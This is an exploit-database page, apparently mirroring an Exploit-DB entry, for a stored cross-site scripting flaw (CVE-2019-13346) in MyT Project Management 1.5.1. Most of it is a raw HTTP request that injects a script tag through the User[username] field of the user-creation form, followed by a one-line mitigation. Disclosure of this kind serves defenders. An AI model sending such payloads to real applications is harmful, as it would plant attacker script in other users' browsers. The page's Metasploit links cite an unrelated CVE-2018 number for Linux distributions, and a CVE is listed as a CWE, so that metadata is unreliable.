header-logo
Suggest Exploit
vendor:
MyT
by:
Metin Yunus Kandemir (kandemir)
6.1
CVSS
MEDIUM
Stored Cross Site Scripting
79
CWE
Product Name: MyT
Affected Version From: 1.5.1
Affected Version To: 1.5.1
Patch Exists: YES
Related CWE: CVE-2019-13346
CPE: a:manageyourteam:myt
Metasploit: https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2018-13346/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2018-13346/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2018-13346/
Other Scripts: N/A
Platforms Tested: Xampp for Windows
2019

MyT Project Management – User[username] Stored Cross Site Scripting

User[username] parameter has a xss vulnerability. Malicious code is being written to database while user is creating process. To exploit vulnerability,add user that setting username as <sCript>alert("XSS")</sCript> malicious code.

Mitigation:

Input validation and output encoding should be used to prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: MyT Project Management - User[username] Stored Cross Site
Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://manageyourteam.net/index.html
# Software Link: https://sourceforge.net/projects/myt/files/latest/download
# Version: 1.5.1
# Category: Webapps
# Tested on: Xampp for Windows
# Software Description : MyT is an extremely powerful project management
tool, and it's easy to use for both administrators and end-users with a
really intuitive structure.
# CVE : CVE-2019-13346
==================================================================

#Description: "User[username]" parameter has a xss vulnerability. Malicious
code is being written to database while user is creating process.
#to exploit vulnerability,add user that setting username as
"<sCript>alert("XSS")</sCript>" malicious code.



POST /myt-1.5.1/user/create HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/myt-1.5.1/user/create
Content-Type: multipart/form-data;
boundary=---------------------------1016442643560510919154680312
Content-Length: 3921
Cookie: PHPSESSID=bp16alfk843c4qll0ejq302b2j
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[username]"

<sCript>alert("XSS")</sCript>
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[password]"

12345
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[password_confirm]"

12345
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[email]"

ad1@gmail.com
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[name]"


-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[surname]"


.
..snip
..snip
.

Navigation

Suggest Exploit

Services By CQR